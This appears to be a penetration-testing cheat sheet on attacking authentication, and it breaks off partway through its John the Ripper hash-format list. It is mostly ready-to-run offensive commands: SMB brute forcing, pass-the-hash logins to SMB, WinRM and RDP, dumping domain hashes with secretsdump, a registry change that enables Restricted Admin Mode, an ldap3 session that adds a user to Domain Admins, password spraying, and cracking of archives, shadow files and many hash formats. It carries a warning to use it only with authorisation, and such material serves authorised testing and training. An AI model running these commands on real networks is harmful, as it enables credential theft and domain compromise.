Authentication

---

These commands should NEVER BE USED against any service that you do not own or have express written consent. Below is a collection of commands that can be used to either bypass authentication in some way or discover credentials and passphrases. A brute-force attack is when an attacker attempts to discover account credentials with the use of a list of possible passwords or passphrases. The attacker systematically checks all possible passwords and passphrases until the correct one is found. This method can also be used to crack the password of an SSH key or to discover a token submitted in a POST request to a website.

Create Wordlists

# CEWL # Scans osbornepro.com and builds a password list with a minimum of 6 chars cewl www.osbornepro.com -m 6 -w osbornepro-cewl.txt # CRUNCH crunch 8 8 -t ,@@^^%%% # first 8 is minimum length # last 8 is maxmimum length # -t goes before the pattern we define # @ Lowercase alpha chars # , Upper case alpha chars # % Numberic chars # ^ Special chars including space # Generate password list based on predefined charsets crunch 4 6 -f /usr/share/crunch/charset.lst mixalpha -o /tmp/crunch.txt # -f is the path to the char set file # mixaplpha set includes all lower and uppercase letters # Generate password list using manually defined chars crunch 4 6 0123456789ABCDEF -o /tmp/crunch.txt # JOHN THE RIPPER # Below modification in /etc/john/john.conf adds 2 digits at the end of each word in defined list $[0-9]$[0-9] # Create wordlist using the defined rule $ john --wordlist=osbornepro-wordlist.txt --rules --stdout > /tmp/new-wordlist.txt

Identify Hash Value

hashid '$6$asdasdaaaaaaaaaaaaaaaaaaaaa' # Interactive GUI Tool hash-identifier

Acccheck Brute Forcing

# SMB Credential Check acccheck -t 10.0.0.1 -u rosborne -p Password123! # SMB Brute Force acccehck -t 10.0.0.1 -U user.lst -P pass.lst acccehck -T host.lst -U user.lst -P pass.lst # Install acccheck wget https://labs.portcullis.co.uk/download/acccheck-0-2-1.tar.gz; tar xf acccheck-0-2-1.tar.gz; rm acccheck-0-2-1.tar.gz; cd acccheck-0-2-1/; mv acccheck.pl /usr/local/sbin/acccheck

Pass The Hash (PTH) Techniques

# SSH (Can Pass the Ticket Only) ssh -o GSSAPIAuthentication=yes rosborne@osbornepro.com -vv # Look for the line # "No Kerberos credentials available (default cache: FILE:/tmp/krb5cc_1045)" # Copy your ticket to the expected location cp rosborne.ccache /tmp/krb5cc_1045 ssh -o GSSAPIAuthentication=yes rosborne@osbornepro.com # SMB PTH pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:<ntlm hash> //10.0.0.1 cmd pth-smbclient //10.0.0.1/C$ -U osbornepro.com/rosborne%aad3b435b51404eeaad3b435b51404ee:<ntlm hash> smbclient -U osbornepro.com/rosborne%hash:hash -n <netbios name> -W osbornepro.com //10.0.0.1/share$ smbclient //10.0.0.1/C$ -U rosborne --pw-nt-hash BD1C6503987F8FF006296118F359FA79 -W osbornepro.com crackmapexec 10.0.0.1 -u user -H <hash> # WINRM PTH evil-winrm.rb -i 10.0.0.1 -u rosborne -H BD1C6503987F8FF006296118F359FA79 python /usr/share/doc/python3-impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:<ntlm hash> Administrator@<target> wmiexec.py osobrnepro.com/rosborne@10.0.0.1 -hashes aad3b435b51404eeaad3b435b51404ee:BD1C6503987F8FF006296118F359FA79 # RDP PTH # Only possible when the system has Restricted Admin Mode enabled # Enable Restricted Admin Mode cme smb 10.0.0.1 -u Administrator -H 8846F7EAEE8FB117AD06BDD830B7586C -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f' xfreerdp /u:admin /d:domain /pth:hash:hash /v:<ip>\n" # LDAP PTH (Impacket Collection) # Dump Hashes secretsdump.py rosborne@10.0.0.1 -hashes aad3b435b51404eeaad3b435b51404ee:BD1C6503987F8FF006296118F359FA79 # Authenticate to Exchange Server python3 >>> import ldap3 >>> user = 'OSBORNEPRO\\EXCHANGE$' >>> password = 'aad3b435b51404eeaad3b435b51404ee:6216d3268ba7634e92313c8b60293248' >>> server = ldap3.Server('OSBORNEPRO.COM') from ldap3 import Server, Connection, SIMPLE, SYNC, ALL, SASL, NTLM connection = ldap3.Connection(server, user=user, password=password, authentication=NTLM) >>> connection.bind() >>> from ldap3.extend.microsoft.addMembersToGroups import ad_add_members_to_groups as addUsersInGroups >>> user_dn = 'CN=IT User,OU=Standard Accounts,DC=osbornepro,DC=com' >>> group_dn = 'CN=Domain Admins,CN=Users,DC=osbornepro,DC=com' >>> addUsersInGroups(connection, user_dn, group_dn) True

Discover Password Policy

$DomainObj = [System.DirectoryServices.ActiveDirectory.Domain)::GetCurrentDomain() $PDC = ($DomainObj.PdcRoleOwner).Name $SearchString = "LDAP://" $SearchString += $PDC + "/" $DistinguishedName = "DC=$($DomainObj.Name.Replace('.', ',DC='))" $SearchString += $DistinguishedName # Use a Spray Password Tool that abides by above policy .\Spray-Passwords.ps1 -Pass Qwerty123! -Admin # -Admin flag checks admin accoutns as well # RESOURCE: https://github.com/ZilentJack/Spray-Passwords/blob/master/Spray-Passwords.ps1

John The Ripper Cracking

# List Possible Hash Formats john --list=formats # Attempt Every Possible Character Combo john --incremental hashes.txt # Pause Cracking by entering "Q" or Ctrl + C john --restore # 7ZIP FILE CRACKING 7z2john.pl protected.7z > protected.hash john --wordlist=wordlist.txt protected.hash # Extract the archive 7z e protected.7z -peasy # ZIP FILE CRACKING zip2john protected.zip > zip.txt john --wordlist=/usr/share/wordlists/rockyou.txt zip.txt # PDF FILE CRACKING pdf2john.pl pdf_protected.pdf > pdf.hash john --wordlist=/usr/share/wordlists/rockyou.txt pdf.hash # OFFICE FILE CRACKING wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/office2john.py # Put all files in same directory python office2john.py PassProtectedWordFile.docx > hash.txt john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt john --show hash.txt # MD5 HASH CRACK john --format=Raw-MD5 passwordFile # NTLM HASH CRACKING john hash.txt --format=NT john --wordlist=cewl.txt hash.txt --format=NT # Use rules defined in /etc/john/john.conf john --rules --wordlist=cewl.txt hash.txt --format=NT # SHADOW FILE CRACKING grep rosborne /etc/passwd > passwdfile.txt grep rosborne /etc/shadow > shadowfile.txt unshadow passwdfile.txt shadowfile.txt > unshadowed.txt # Now crack with John john --rules --wordlist-cewl.txt unshadowed.txt --fork is used to define a number of threads --node can be used to crack against multiple computers AFS - Kerberos AFS DES -------------------------- $ cat hashes.txt $K4$a8dc8aeaa2c48a97, $ john hashes.txt $ john --format=afs hashes.txt $ cat hashes.txt username:$K4$a8dc8aeaa2c48a97, $ john hashes.txt $ john --format=afs hashes.txt $ cat hashes.txt username:$K4$a8dc8aeaa2c48a97,::::::: $ john hashes.txt $ john --format=afs hashes.txt BFEGG - EGGDROP ---------------------------- $ cat hashes.txt +C/.8o.Wuph9. $ john hashes.txt # Doesn't work. JTR detects hash as "Traditional DES". $ john --format=bfegg hashes.txt $ cat hashes.txt username:+C/.8o.Wuph9. $ john hashes.txt # Doesn't work. JTR detects hash as "Traditional DES". $ john --format=bfegg hashes.txt $ cat hashes.txt username:+C/.8o.Wuph9.::::::: $ john hashes.txt # Doesn't work. JTR detects hash as "Traditional DES". $ john --format=bfegg hashes.txt BF - OpenBSD BlowFish ------------------------------ $ cat hashes.txt $2a$05$CCCCCCCCCCCCCCCCCCCCC.7uG0VCzI2bS7j6ymqJi9CdcdxiRTWNy $ john hashes.txt $ john --format=bf hashes.txt $ cat hashes.txt username:$2a$05$CCCCCCCCCCCCCCCCCCCCC.7uG0VCzI2bS7j6ymqJi9CdcdxiRTWNy $ john hashes.txt $ john --format=bf hashes.txt $ cat hashes.txt username:$2a$05$CCCCCCCCCCCCCCCCCCCCC.7uG0VCzI2bS7j6ymqJi9CdcdxiRTWNy::::::: $ john hashes.txt $ john --format=bf hashes.txt BSDI - BSDI DES --------------------------------- $ cat hashes.txt _J9..SDSD5YGyRCr4W4c $ john hashes.txt $ john --format=bsdi hashes.txt $ cat hashes.txt username:_J9..SDSD5YGyRCr4W4c $ john hashes.txt $ john --format=bsdi hashes.txt $ cat hashes.txt username:_J9..SDSD5YGyRCr4W4c::::::: $ john hashes.txt $ john --format=bsdi hashes.txt CRYPT - GENERIC CRYPT(3) ---------------------------------- $ cat hashes.txt SDbsugeBiC58A $ john hashes.txt # Doesn't work. JTR detects hash as "Traditional DES". $ john --format=crypt hashes.txt $ cat hashes.txt username:SDbsugeBiC58A $ john hashes.txt # Doesn't work. JTR detects hash as "Traditional DES". $ john --format=crypt hashes.txt $ cat hashes.txt username:SDbsugeBiC58A::::::: $ john hashes.txt # Doesn't work. JTR detects hash as "Traditional DES". $ john --format=crypt hashes.txt DES - TRADITIONAL DES --------------------------------- $ cat hashes.txt SDbsugeBiC58A $ john hashes.txt $ john --format=des hashes.txt $ cat hashes.txt username:SDbsugeBiC58A $ john hashes.txt $ john --format=des hashes.txt $ cat hashes.txt username:SDbsugeBiC58A::::::: $ john hashes.txt $ john --format=des hashes.txt DOMINOSEC - MORE SECURE INTERNET PASSWORD ------------------------------------------ $ cat hashes.txt (GVMroLzc50YK/Yd+L8KH) $ john hashes.txt $ john --format=dominosec hashes.txt $ cat hashes.txt username:(GVMroLzc50YK/Yd+L8KH) $ john hashes.txt $ john --format=dominosec hashes.txt $ cat hashes.txt username:(GVMroLzc50YK/Yd+L8KH)::::::: $ john hashes.txt $ john --format=dominosec hashes.txt EPiSERVER SID HASHES -------------------------------------------- $ cat hashes.txt 0x5F1D84A6DE97E2BEFB637A3CB5318AFEF0750B856CF1836BD1D4470175BE 0x4D5EFDFA143EDF74193076F174AC47CEBF2F417F $ john hashes.txt $ # NB: There is no --format option for this hash type $ cat hashes.txt username:0x5F1D84A6DE97E2BEFB637A3CB5318AFEF0750B856CF1836BD1D4470175BE 0x4D5EFDFA143EDF74193076F174AC47CEBF2F417F $ john hashes.txt $ # NB: There is no --format option for this hash type $ cat hashes.txt username:0x5F1D84A6DE97E2BEFB637A3CB5318AFEF0750B856CF1836BD1D4470175BE 0x4D5EFDFA143EDF74193076F174AC47CEBF2F417F::::::: $ john hashes.txt $ # NB: There is no --format option for this hash type HDAA HTTP DIGEST ACCESS AUTH -------------------------------------------------- $ cat hashes.txt $response$679066476e67b5c7c4e88f04be567f8b$user$myrealm$GET$/$8c12bd8f728afe56d45a0ce846b70e5a$00000001$4b61913cec32e2c9$auth $ john hashes.txt $ john --format=hdaa hashes.txt $ cat hashes.txt username:$response$679066476e67b5c7c4e88f04be567f8b$user$myrealm$GET$/$8c12bd8f728afe56d45a0ce846b70e5a$00000001$4b61913cec32e2c9$auth $ john hashes.txt $ john --format=hdaa hashes.txt $ cat hashes.txt username:$response$679066476e67b5c7c4e88f04be567f8b$user$myrealm$GET$/$8c12bd8f728afe56d45a0ce846b70e5a$00000001$4b61913cec32e2c9$auth::::::: $ john hashes.txt $ john --format=hdaa hashes.txt HMAC-MD5 HMAC MD5 --------------------------------------------------------- $ cat hashes.txt what do ya want for nothing?#750c783e6ab0b503eaa86e310a5db738 $ john hashes.txt $ john --format=hmac-md5 hashes.txt $ cat hashes.txt username:what do ya want for nothing?#750c783e6ab0b503eaa86e310a5db738 $ john hashes.txt $ john --format=hmac-md5 hashes.txt $ cat hashes.txt username:what do ya want for nothing?#750c783e6ab0b503eaa86e310a5db738::::::: $ john hashes.txt $ john --format=hmac-md5 hashes.txt HMAILSERVER - HMAILSERVER -------------------------------------------------------------- $ cat hashes.txt cc06fa688a64cdeea43d3c0fb761fede7e3ccf00a9daea9c79f7d458e06f88327f16dd $ john hashes.txt $ john --format=hmailserver hashes.txt $ cat hashes.txt username:cc06fa688a64cdeea43d3c0fb761fede7e3ccf00a9daea9c79f7d458e06f88327f16dd $ john hashes.txt $ john --format=hmailserver hashes.txt $ cat hashes.txt username:cc06fa688a64cdeea43d3c0fb761fede7e3ccf00a9daea9c79f7d458e06f88327f16dd::::::: $ john hashes.txt $ john --format=hmailserver hashes.txt IPB2 - IPB2 MD5 ------------------------------ $ cat hashes.txt $IPB2$2e75504633$d891f03a7327639bc632d62a7f302604 $ john hashes.txt $ john --format=ipb2 hashes.txt $ cat hashes.txt username:$IPB2$2e75504633$d891f03a7327639bc632d62a7f302604 $ john hashes.txt $ john --format=ipb2 hashes.txt $ cat hashes.txt username:$IPB2$2e75504633$d891f03a7327639bc632d62a7f302604::::::: $ john hashes.txt $ john --format=ipb2 hashes.txt KRB4 - KERBEROS v4 TGT -------------------------------------- $ cat hashes.txt $af$ENGIN.UMICH.EDU$44feffd06e68e30bc8890e253760858d $ john hashes.txt $ john --format=krb4 hashes.txt $ cat hashes.txt username:$af$ENGIN.UMICH.EDU$44feffd06e68e30bc8890e253760858d $ john hashes.txt $ john --format=krb4 hashes.txt $ cat hashes.txt username:$af$ENGIN.UMICH.EDU$44feffd06e68e30bc8890e253760858d::::::: $ john hashes.txt $ john --format=krb4 hashes.txt KRB5 KERBEROS v5 TGT ------------------------------- $ cat hashes.txt $krb5$oskov$ACM.UIUC.EDU$4730d7249765615d6f3652321c4fb76d09fb9cd06faeb0c31b8737f9fdfcde4bd4259c31cb1dff25df39173b09abdff08373302d99ac09802a290915243d9f0ea0313fdedc7f8d1fae0d9df8f0ee6233818d317f03a72c2e77b480b2bc50d1ca14fba85133ea00e472c50dbc825291e2853bd60a969ddb69dae35b604b34ea2c2265a4ffc72e9fb811da17c7f2887ccb17e2f87cd1f6c28a9afc0c083a9356a9ee2a28d2e4a01fc7ea90cc8836b8e25650c3a1409b811d0bad42a59aa418143291d42d7b1e6cb5b1876a4cc758d721323a762e943f774630385c9faa68df6f3a94422f97 $ john hashes.txt $ john --format=krb5 hashes.txt $ cat hashes.txt username:$krb5$oskov$ACM.UIUC.EDU$4730d7249765615d6f3652321c4fb76d09fb9cd06faeb0c31b8737f9fdfcde4bd4259c31cb1dff25df39173b09abdff08373302d99ac09802a290915243d9f0ea0313fdedc7f8d1fae0d9df8f0ee6233818d317f03a72c2e77b480b2bc50d1ca14fba85133ea00e472c50dbc825291e2853bd60a969ddb69dae35b604b34ea2c2265a4ffc72e9fb811da17c7f2887ccb17e2f87cd1f6c28a9afc0c083a9356a9ee2a28d2e4a01fc7ea90cc8836b8e25650c3a1409b811d0bad42a59aa418143291d42d7b1e6cb5b1876a4cc758d721323a762e943f774630385c9faa68df6f3a94422f97 $ john hashes.txt $ john --format=krb5 hashes.txt $ cat hashes.txt username:$krb5$oskov$ACM.UIUC.EDU$4730d7249765615d6f3652321c4fb76d09fb9cd06faeb0c31b8737f9fdfcde4bd4259c31cb1dff25df39173b09abdff08373302d99ac09802a290915243d9f0ea0313fdedc7f8d1fae0d9df8f0ee6233818d317f03a72c2e77b480b2bc50d1ca14fba85133ea00e472c50dbc825291e2853bd60a969ddb69dae35b604b34ea2c2265a4ffc72e9fb811da17c7f2887ccb17e2f87cd1f6c28a9afc0c083a9356a9ee2a28d2e4a01fc7ea90cc8836b8e25650c3a1409b811d0bad42a59aa418143291d42d7b1e6cb5b1876a4cc758d721323a762e943f774630385c9faa68df6f3a94422f97::::::: $ john hashes.txt $ john --format=krb5 hashes.txt LM - LM DES ---------------------- $ cat hashes.txt $LM$a9c604d244c4e99d $ john hashes.txt $ john --format=lm hashes.txt $ cat hashes.txt username:$LM$a9c604d244c4e99d $ john hashes.txt $ john --format=lm hashes.txt $ cat hashes.txt username:$LM$a9c604d244c4e99d::::::: $ john hashes.txt $ john --format=lm hashes.txt LOTUS 5 - LOTUS 5 -------------------------- $ cat hashes.txt 355E98E7C7B59BD810ED845AD0FD2FC4 $ john hashes.txt # Doesn't work. JTR detects hash as "LM DES". $ john --format=lotus5 hashes.txt $ cat hashes.txt username:355E98E7C7B59BD810ED845AD0FD2FC4 $ john hashes.txt # Doesn't work. JTR detects hash as "LM DES". $ john --format=lotus5 hashes.txt $ cat hashes.txt username:355E98E7C7B59BD810ED845AD0FD2FC4::::::: $ john hashes.txt # Doesn't work. JTR detects hash as "LM DES". $ john --format=lotus5 hashes.txt MD4-GEN GENERIC SALTED MD4 -------------------------------- $ cat hashes.txt $MD4p$salt$15ad2b7a23e5088942f9d3772181b384 $ john hashes.txt $ john --format=md4-gen hashes.txt $ cat hashes.txt username:$MD4p$salt$15ad2b7a23e5088942f9d3772181b384 $ john hashes.txt $ john --format=md4-gen hashes.txt $ cat hashes.txt username:$MD4p$salt$15ad2b7a23e5088942f9d3772181b384::::::: $ john hashes.txt $ john --format=md4-gen hashes.txt MD5 FREEBSD MD5 ------------------------- $ cat hashes.txt $1$12345678$aIccj83HRDBo6ux1bVx7D1 $ john hashes.txt $ john --format=md5 hashes.txt $ cat hashes.txt username:$1$12345678$aIccj83HRDBo6ux1bVx7D1 $ john hashes.txt $ john --format=md5 hashes.txt $ cat hashes.txt username:$1$12345678$aIccj83HRDBo6ux1bVx7D1::::::: $ john hashes.txt $ john --format=md5 hashes.txt $ cat hashes.txt $apr1$Q6ZYh...$RV6ft2bZ8j.NGrxLYaJt9. $ john hashes.txt $ john --format=md5 hashes.txt $ cat hashes.txt username:$apr1$Q6ZYh...$RV6ft2bZ8j.NGrxLYaJt9. $ john hashes.txt $ john --format=md5 hashes.txt $ cat hashes.txt username:$apr1$Q6ZYh...$RV6ft2bZ8j.NGrxLYaJt9.::::::: $ john hashes.txt $ john --format=md5 hashes.txt MediaWIKI MEDIA WIKI MD5 ------------------------ $ cat hashes.txt $B$113$de2874e33da25313d808d2a8cbf31485 $ john hashes.txt $ john --format=mediawiki hashes.txt $ cat hashes.txt username:$B$113$de2874e33da25313d808d2a8cbf31485 $ john hashes.txt $ john --format=mediawiki hashes.txt $ cat hashes.txt username:$B$113$de2874e33da25313d808d2a8cbf31485::::::: $ john hashes.txt $ john --format=mediawiki hashes.txt MSCASH - M$ CACHE HASH ------------------------------ $ cat hashes.txt M$test1#64cd29e36a8431a2b111378564a10631 $ john hashes.txt # Doesn't work. JTR detects hash as "HMAC MD5". $ john --format=mscash hashes.txt $ cat hashes.txt username:M$test1#64cd29e36a8431a2b111378564a10631 $ john hashes.txt # Doesn't work. JTR detects hash as "HMAC MD5". $ john --format=mscash hashes.txt $ cat hashes.txt username:M$test1#64cd29e36a8431a2b111378564a10631::::::: $ john hashes.txt # Doesn't work. JTR detects hash as "HMAC MD5". $ john --format=mscash hashes.txt MSCASH2 M$ CACHE HASH 2 -------------------------------- $ cat hashes.txt $DCC2$10240#test1#607bbe89611e37446e736f7856515bf8 $ john hashes.txt # Doesn't work. JTR detects hash as "M$ Cache Hash". $ john --format=mscash2 hashes.txt $ cat hashes.txt username:$DCC2$10240#test1#607bbe89611e37446e736f7856515bf8 $ john hashes.txt $ john --format=mscash2 hashes.txt $ cat hashes.txt username:$DCC2$10240#test1#607bbe89611e37446e736f7856515bf8::::::: $ john hashes.txt $ john --format=mscash2 hashes.txt MSCHAPV2 MSCHAPv2 C/R MD4 DES ---------------------------------- $ cat hashes.txt $MSCHAPv2$d94e7c7972b2376b28c268583e162de7$eba25a3b04d2c7085d01f842e2befc91745c40db0f792356$0677ca7318fd7f65ae1b4f58c9f4f400$lameuser $ john hashes.txt $ john --format=mschapv2 hashes.txt $ cat hashes.txt username:$MSCHAPv2$d94e7c7972b2376b28c268583e162de7$eba25a3b04d2c7085d01f842e2befc91745c40db0f792356$0677ca7318fd7f65ae1b4f58c9f4f400$lameuser $ john hashes.txt $ john --format=mschapv2 hashes.txt $ cat hashes.txt username:$MSCHAPv2$d94e7c7972b2376b28c268583e162de7$eba25a3b04d2c7085d01f842e2befc91745c40db0f792356$0677ca7318fd7f65ae1b4f58c9f4f400$lameuser::::::: $ john hashes.txt $ john --format=mschapv2 hashes.txt MSKRB5 MS KERBEROS AS-REQ PRE-AUTH ----------------------------------------- $ cat hashes.txt $mskrb5$$$98cd00b6f222d1d34e08fe0823196e0b$5937503ec29e3ce4e94a051632d0fff7b6781f93e3decf7dca707340239300d602932154 $ john hashes.txt $ john --format=mskrb5 hashes.txt $ cat hashes.txt username:$mskrb5$$$98cd00b6f222d1d34e08fe0823196e0b$5937503ec29e3ce4e94a051632d0fff7b6781f93e3decf7dca707340239300d602932154 $ john hashes.txt $ john --format=mskrb5 hashes.txt $ cat hashes.txt username:$mskrb5$$$98cd00b6f222d1d34e08fe0823196e0b$5937503ec29e3ce4e94a051632d0fff7b6781f93e3decf7dca707340239300d602932154::::::: $ john hashes.txt $ john --format=mskrb5 hashes.txt MSSQL05 - MS-SQL05 --------------------- $ cat hashes.txt 0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 $ john hashes.txt $ john --format=mssql05 hashes.txt $ cat hashes.txt username:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 $ john hashes.txt $ john --format=mssql05 hashes.txt $ cat hashes.txt username:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908::::::: $ john hashes.txt $ john --format=mssql05 hashes.txt MSSQL MS-SQL ----------------- $ cat hashes.txt 0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 $ john hashes.txt $ john --format=mssql hashes.txt $ cat hashes.txt username:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 $ john hashes.txt $ john --format=mssql hashes.txt $ cat hashes.txt username:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254::::::: $ john hashes.txt $ john --format=mssql hashes.txt MYSQL FAST - MYSQL -FAST -------------------------- $ cat hashes.txt 60671c896665c3fa $ john hashes.txt $ john --format=mysql-fast hashes.txt $ cat hashes.txt username:60671c896665c3fa $ john hashes.txt $ john --format=mysql-fast hashes.txt $ cat hashes.txt username:60671c896665c3fa::::::: $ john hashes.txt $ john --format=mysql-fast hashes.txt MYSQL - MYSQL ----------------- $ cat hashes.txt 5d2e19393cc5ef67 $ john hashes.txt # Doesn't work. JTR detects hash as "MYSQL_fast". $ john --format=mysql hashes.txt $ cat hashes.txt username:5d2e19393cc5ef67 $ john hashes.txt # Doesn't work. JTR detects hash as "MYSQL_fast". $ john --format=mysql hashes.txt $ cat hashes.txt username:5d2e19393cc5ef67::::::: $ john hashes.txt # Doesn't work. JTR detects hash as "MYSQL_fast". $ john --format=mysql hashes.txt MYSQL - SHA 1 MYSQL 4.1 DOUBLE SHA-1 -------------------------------------- $ cat hashes.txt *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 $ john hashes.txt $ john --format=mysql-sha1 hashes.txt $ cat hashes.txt username:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 $ john hashes.txt $ john --format=mysql-sha1 hashes.txt $ cat hashes.txt username:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19::::::: $ john hashes.txt $ john --format=mysql-sha1 hashes.txt NETLM - LM C/R DES ------------------------ $ cat hashes.txt $NETLM$1122334455667788$0836F085B124F33895875FB1951905DD2F85252CC731BB25 $ john hashes.txt $ john --format=netlm hashes.txt $ cat hashes.txt username:$NETLM$1122334455667788$0836F085B124F33895875FB1951905DD2F85252CC731BB25 $ john hashes.txt $ john --format=netlm hashes.txt $ cat hashes.txt username:$NETLM$1122334455667788$0836F085B124F33895875FB1951905DD2F85252CC731BB25::::::: $ john hashes.txt $ john --format=netlm hashes.txt NETLMV2 - LMV2 C/R MD4 HMAC-MD5 ---------------------------------- $ cat hashes.txt $NETLMv2$USER1$1122334455667788$B1D163EA5881504F3963DC50FCDC26C1$EB4D9E8138149E20 $ john hashes.txt $ john --format=netlmv2 hashes.txt $ cat hashes.txt username:$NETLMv2$USER1$1122334455667788$B1D163EA5881504F3963DC50FCDC26C1$EB4D9E8138149E20 $ john hashes.txt $ john --format=netlmv2 hashes.txt $ cat hashes.txt username:$NETLMv2$USER1$1122334455667788$B1D163EA5881504F3963DC50FCDC26C1$EB4D9E8138149E20::::::: $ john hashes.txt $ john --format=netlmv2 hashes.txt NETNTLM NTLMv1 C/R MD4 DES ESS MD5 ---------------------------------------- $ cat hashes.txt $NETNTLM$1122334455667788$B2B2220790F40C88BCFF347C652F67A7C4A70D3BEBD70233 $ john hashes.txt $ john --format=netntlm hashes.txt $ cat hashes.txt username:$NETNTLM$1122334455667788$B2B2220790F40C88BCFF347C652F67A7C4A70D3BEBD70233 $ john hashes.txt $ john --format=netntlm hashes.txt $ cat hashes.txt username:$NETNTLM$1122334455667788$B2B2220790F40C88BCFF347C652F67A7C4A70D3BEBD70233::::::: $ john hashes.txt $ john --format=netntlm hashes.txt NETNTLMV2 NTLMv2 C/R MD4 HMAC MD5 -------------------------------------- $ cat hashes.txt $NETNTLMv2$NTLMV2TESTWORKGROUP$1122334455667788$07659A550D5E9D02996DFD95C87EC1D5$0101000000000000006CF6385B74CA01B3610B02D99732DD000000000200120057004F0052004B00470052004F00550050000100200044004100540041002E00420049004E0043002D0053004500430055005200490000000000 $ john hashes.txt $ john --format=netntlmv2 hashes.txt $ cat hashes.txt username:$NETNTLMv2$NTLMV2TESTWORKGROUP$1122334455667788$07659A550D5E9D02996DFD95C87EC1D5$0101000000000000006CF6385B74CA01B3610B02D99732DD000000000200120057004F0052004B00470052004F00550050000100200044004100540041002E00420049004E0043002D0053004500430055005200490000000000 $ john hashes.txt $ john --format=netntlmv2 hashes.txt $ cat hashes.txt username:$NETNTLMv2$NTLMV2TESTWORKGROUP$1122334455667788$07659A550D5E9D02996DFD95C87EC1D5$0101000000000000006CF6385B74CA01B3610B02D99732DD000000000200120057004F0052004B00470052004F00550050000100200044004100540041002E00420049004E0043002D0053004500430055005200490000000000::::::: $ john hashes.txt $ john --format=netntlmv2 hashes.txt NETHALFLM - HALFLM C/R DES ------------------------------------- cat hashes.txt $NETHALFLM$1122334455667788$6E1EC36D3417CE9E09A4424309F116C4C991948DAEB4ADAD $ john hashes.txt $ john --format=nethalflm hashes.txt $ cat hashes.txt username:$NETHALFLM$1122334455667788$6E1EC36D3417CE9E09A4424309F116C4C991948DAEB4ADAD $ john hashes.txt $ john --format=nethalflm hashes.txt $ cat hashes.txt username:$NETHALFLM$1122334455667788$6E1EC36D3417CE9E09A4424309F116C4C991948DAEB4ADAD::::::: $ john hashes.txt $ john --format=nethalflm hashes.txt MD5NS NETSCREEN MD5 ---------------------------- $ cat hashes.txt admin$nMjFM0rdC9iOc+xIFsGEm3LtAeGZhn $ john hashes.txt $ john --format=md5ns hashes.txt $ cat hashes.txt username:admin$nMjFM0rdC9iOc+xIFsGEm3LtAeGZhn $ john hashes.txt $ john --format=md5ns hashes.txt $ cat hashes.txt username:admin$nMjFM0rdC9iOc+xIFsGEm3LtAeGZhn::::::: $ john hashes.txt $ john --format=md5ns hashes.txt NSLDAP NETSCAPE LDAP SHA ---------------------------------- $ cat hashes.txt {SHA}cMiB1KJphN3OeV9vcYF8nPRIDnk= $ john hashes.txt $ john --format=nsldap hashes.txt $ cat hashes.txt username:{SHA}cMiB1KJphN3OeV9vcYF8nPRIDnk= $ john hashes.txt $ john --format=nsldap hashes.txt $ cat hashes.txt username:{SHA}cMiB1KJphN3OeV9vcYF8nPRIDnk=::::::: $ john hashes.txt $ john --format=nsldap hashes.txt SSHA NETSCAPE LDAP SSHA ----------------------------- $ cat hashes.txt {SSHA}WTT3B9Jjr8gOt0Q7WMs9/XvukyhTQj0Ns0jMKQ== $ john hashes.txt $ john --format=ssha hashes.txt $ cat hashes.txt username:{SSHA}WTT3B9Jjr8gOt0Q7WMs9/XvukyhTQj0Ns0jMKQ== $ john hashes.txt $ john --format=ssha hashes.txt $ cat hashes.txt username:{SSHA}WTT3B9Jjr8gOt0Q7WMs9/XvukyhTQj0Ns0jMKQ==::::::: $ john hashes.txt $ john --format=ssha hashes.txt NT - NT MD4 ----------------- $ cat hashes.txt $NT$8846f7eaee8fb117ad06bdd830b7586c $ john hashes.txt $ john --format=nt hashes.txt $ cat hashes.txt username:$NT$8846f7eaee8fb117ad06bdd830b7586c $ john hashes.txt $ john --format=nt hashes.txt $ cat hashes.txt username:$NT$8846f7eaee8fb117ad06bdd830b7586c::::::: $ john hashes.txt $ john --format=nt hashes.txt OPENSSHA OPENLDAP SSHA --------------------------------- $ cat hashes.txt {SSHA}hHSEPW3qeiOo5Pl2MpHQCXh0vgfyVR/X $ john hashes.txt $ john --format=openssha hashes.txt $ cat hashes.txt username:{SSHA}hHSEPW3qeiOo5Pl2MpHQCXh0vgfyVR/X $ john hashes.txt $ john --format=openssha hashes.txt $ cat hashes.txt username:{SSHA}hHSEPW3qeiOo5Pl2MpHQCXh0vgfyVR/X::::::: $ john hashes.txt $ john --format=openssha hashes.txt ORACLE 11G ------------------------ $ cat hashes.txt 5FDAB69F543563582BA57894FE1C1361FB8ED57B903603F2C52ED1B4D642 $ john hashes.txt $ john --format=oracle11 hashes.txt $ cat hashes.txt username:5FDAB69F543563582BA57894FE1C1361FB8ED57B903603F2C52ED1B4D642 $ john hashes.txt $ john --format=oracle11 hashes.txt $ cat hashes.txt username:5FDAB69F543563582BA57894FE1C1361FB8ED57B903603F2C52ED1B4D642::::::: $ john hashes.txt $ john --format=oracle11 hashes.txt ORACLE ----------------------- $ cat hashes.txt O$SIMON#4F8BC1809CB2AF77 $ john hashes.txt $ john --format=oracle hashes.txt $ cat hashes.txt username:O$SIMON#4F8BC1809CB2AF77 $ john hashes.txt $ john --format=oracle hashes.txt $ cat hashes.txt username:O$SIMON#4F8BC1809CB2AF77::::::: $ john hashes.txt $ john --format=oracle hashes.txt PDF -------------------- $ cat hashes.txt $pdf$Standard*badad1e86442699427116d3e5d5271bc80a27814fc5e80f815efeef839354c5f*289ece9b5ce451a5d7064693dab3badf101112131415161718191a1b1c1d1e1f*16*34b1b6e593787af681a9b63fa8bf563b*1*1*0*1*4*128*-4*3*2 $ john hashes.txt $ john --format=pdf hashes.txt $ cat hashes.txt 